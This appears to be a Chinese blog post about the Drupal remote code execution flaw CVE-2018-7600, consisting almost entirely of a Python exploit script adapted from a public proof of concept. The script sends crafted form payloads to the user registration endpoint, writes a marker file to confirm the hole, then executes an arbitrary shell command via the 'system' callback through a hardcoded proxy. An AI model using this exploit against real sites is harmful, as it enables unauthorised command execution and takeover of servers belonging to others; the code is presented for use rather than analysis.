Drupal是一款开源的内容管理系统,使用php语言,在业界广泛使用。
影响:Drupal 6.x,7.x,8.x

  • exploit
#!/usr/bin/env
import sys
import requests

# print ('################################################################')
# print ('# Proof-Of-Concept for CVE-2018-7600')
# print ('# by Vitalii Rudnykh')
# print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
# print ('# https://github.com/a2u/CVE-2018-7600')
# print ('################################################################')
# print ('Provided only for educational or information purposes\n')

# target = input('Enter target url (example: https://domain.ltd/): ')

def check():
    proxies = {"http": "http://192.11.22.13:1080"}
    payload_check = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "ok11ok" | tee hello1.txt'}
    target_url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    payload_check_html = requests.post(target_url, proxies=proxies, data=payload_check)

    url  = target+"hello1.txt"
    #print url
    html = requests.get(url,proxies=proxies)
    #print html.content
    if (html.status_code == 200) and ("ok11ok" in html.content):
        print "Vulnerability!"
        main()
    else:
        print "Not Vulnerability!"



def main():
    # Add proxy support (eg. BURP to analyze HTTP(s) traffic)
    # set verify = False if your proxy certificate is self signed
    # remember to set proxies both for http and https
    #
    # example:
    # proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
    # verify = False
    proxies = {"http": "http://192.11.22.13:1080"}

    url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    payload_exp = {'form_id': 'user_register_form',
               '_drupal_ajax': '1',
               'mail[a][#lazy_builder][0]': 'system',
               'mail[a][#lazy_builder][1][]': '%s'%cmd}
    payload_exp_html = requests.post(url, proxies=proxies, data=payload_exp).content[:-75]
    print payload_exp_html

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print 'Usage: python exploit.py ip:port  "cmd"'
        sys.exit(1)
    else:
        target =  sys.argv[1]
        #fun = sys.argv[2]
        cmd = sys.argv[2]
        if not target.startswith("http://"):
            target = "http://" +target
        if not target.endswith("/"):
            target = target +  "/"
        check()

发表评论

电子邮件地址不会被公开。 必填项已用*标注